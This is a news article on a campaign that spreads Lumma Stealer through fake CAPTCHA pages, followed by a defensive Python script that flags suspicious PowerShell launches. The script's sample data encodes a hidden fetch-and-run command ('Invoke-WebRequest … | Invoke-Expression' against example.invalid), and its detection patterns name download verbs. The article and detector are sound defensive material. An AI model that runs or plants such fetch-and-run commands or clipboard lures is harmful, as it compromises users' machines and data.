Fake human verification pages spread Lumma Stealer malware
CloudSEK's Threat Intelligence team has discovered an innovative method of distributing the Lumma Stealer malware through fake human verification pages. This approach, first identified by Unit42 at Palo Alto Networks, specifically targets Windows users but can potentially deliver various malicious software.
The cybercriminals behind this campaign are setting up phishing websites hosted on platforms commonly perceived as safe, such as Amazon S3 and content delivery networks (CDNs). These sites trick users into completing a fake Google CAPTCHA verification. Upon clicking the "Verify" button, users are misled into following specific instructions: opening the Run dialog (Win+R), pasting the copied content, and pressing Enter.
According to CloudSEK, this action triggers a hidden JavaScript function, which copies a base64-encoded PowerShell command to the user's clipboard. When the user executes this command, it silently downloads the Lumma Stealer malware from a remote server, compromising the system.
Anshuman Das, Security Researcher at CloudSEK, said, "This new tactic is particularly dangerous because it plays on users' trust in widely recognized CAPTCHA verifications, which they encounter regularly online. By disguising malicious activity behind what seems like a routine security check, attackers can easily trick users into executing harmful commands on their systems. What's more concerning is that this technique, currently distributing the Lumma Stealer, could be adapted to spread other types of malware, making it a highly versatile and evolving threat."
The infection process typically involves several steps. Initially, the user is directed to a fake verification page. A PowerShell script is then copied to the clipboard through the deceptive CAPTCHA prompt. When the script is executed, it runs PowerShell in a hidden window, downloading Lumma Stealer from a remote server. The malware then establishes connections with attacker-controlled domains, putting users and their data at risk.
CloudSEK's key observations include the use of base64 encoding and clipboard manipulation to avoid detection. The fake human verification pages are found on well-known platforms such as Amazon S3 and CDNs. Additionally, the malware can download further components, complicating its detection and analysis. Although this campaign primarily targets Lumma Stealer distribution, it poses a risk of tricking users into downloading various kinds of malicious files to their Windows devices.
CloudSEK has recommended a few measures to mitigate these threats. Users and organisations should educate employees about this new social engineering tactic, specifically the danger of copying and pasting unknown commands. Organisations are also advised to deploy advanced endpoint protection solutions capable of detecting and blocking PowerShell-based attacks, monitor network traffic for suspicious connections to newly registered or uncommon domains, and maintain systems with regular updates and patches to reduce vulnerabilities exploited by Lumma Stealer.
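As an added defensive illustration (not code from CloudSEK, Unit42 or the article), the script below shows how the endpoint detection the article recommends could be approached over process-creation telemetry. It looks for the traits described above: a base64-encoded PowerShell command, a hidden window, a download verb in the decoded script, and powershell.exe launched from the shell the Run dialog lives in. The pipe-delimited log format, the field names, the sample events and the `example.invalid` URL are constructed assumptions for the example; no real domain or payload from the campaign is used.

```python
"""Triage process-creation events for the fake-CAPTCHA clipboard-to-Run pattern.

Added illustration. The log format (time|parent_image|image|command_line) and the
sample events are constructed for this example and are not any vendor's schema.
"""
import base64
import binascii
import re

# powershell.exe accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...);
# list the prefixes longest-first so the alternation matches greedily.
_ENC_PREFIXES = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENCODED_RE = re.compile(r"-(?:" + _ENC_PREFIXES + r")\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w[a-z]*\s+hidden", re.I)          # -w / -WindowStyle hidden
DOWNLOAD_RE = re.compile(
    r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient"
    r"|start-bitstransfer|curl|wget)\b", re.I)
INMEMORY_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)


def decode_encoded_command(b64: str):
    """Return the UTF-16LE script behind an -EncodedCommand value, or None if it
    is not valid base64 / UTF-16LE (malformed input must not crash triage)."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def parse_event(line: str) -> dict:
    """Split one constructed log line into its four fields."""
    ts, parent, image, cmdline = line.split("|", 3)
    return {"time": ts, "parent": parent.lower(), "image": image.lower(), "cmdline": cmdline}


def analyze_event(event: dict) -> dict:
    """Collect indicators for one event and assign a verdict."""
    cmd = event["cmdline"]
    indicators, decoded, script = [], None, cmd
    m = ENCODED_RE.search(cmd)
    if m:
        indicators.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
        if decoded is None:
            indicators.append("undecodable_encoded_command")
        else:
            script = decoded          # inspect the real script, not the base64 blob
    if HIDDEN_RE.search(cmd):
        indicators.append("hidden_window")
    if DOWNLOAD_RE.search(script):
        indicators.append("remote_download")
    if INMEMORY_RE.search(script):
        indicators.append("in_memory_execution")
    # The Run dialog is hosted by explorer.exe, so a pasted command shows
    # explorer.exe as the parent of powershell.exe.
    if event["parent"].endswith("explorer.exe") and event["image"].endswith("powershell.exe"):
        indicators.append("launched_from_shell")
    hits = set(indicators)
    if {"hidden_window", "remote_download"} <= hits or len(hits) >= 3:
        verdict = "alert"
    elif hits:
        verdict = "review"           # e.g. a legitimate encoded admin script
    else:
        verdict = "benign"
    return {"time": event["time"], "decoded": decoded, "indicators": indicators, "verdict": verdict}


def triage(lines) -> list:
    """Analyze constructed log lines and return everything that is not benign."""
    results = [analyze_event(parse_event(line)) for line in lines]
    return [r for r in results if r["verdict"] != "benign"]


def encode_ps(script: str) -> str:
    """Base64 of UTF-16LE, the form -EncodedCommand expects; used only to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (paths are typical Windows locations, not captured data).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CMD = r"C:\Windows\System32\cmd.exe"
ADMIN_SCRIPT = encode_ps("Get-Service | Where-Object Status -eq 'Running'")
LURE_SCRIPT = encode_ps("Invoke-WebRequest http://example.invalid/payload.txt | Invoke-Expression")
SAMPLE_EVENTS = [
    "2024-09-20T10:01:05|" + CMD + "|" + PS + "|powershell.exe -NoProfile -Command Get-Date",
    "2024-09-20T10:07:41|" + CMD + "|" + PS + "|powershell.exe -EncodedCommand " + ADMIN_SCRIPT,
    "2024-09-20T10:12:19|" + EXPLORER + "|" + PS + "|powershell.exe -w hidden -ep bypass -enc " + LURE_SCRIPT,
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["time"], r["verdict"], ", ".join(r["indicators"]))
```

The decoded script, not the raw command line, is what the download and in-memory checks inspect; a rule that only pattern-matches the visible command line never sees past the base64 blob, which is exactly the evasion the article describes. The "review" tier exists because encoded commands alone are common in legitimate administration, so the explorer.exe parent and the hidden window are what lift an event to an alert.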
In light of these findings, individuals and organisations must remain vigilant against emerging threats like the Lumma Stealer malware. Cybercriminals' innovative methods underscore the importance of ongoing education and awareness regarding social engineering tactics. By implementing robust cybersecurity measures, including advanced endpoint protection and regular system updates, users can better safeguard their systems against these evolving threats. As malware distribution techniques advance, a proactive approach will be essential in maintaining security and protecting sensitive information.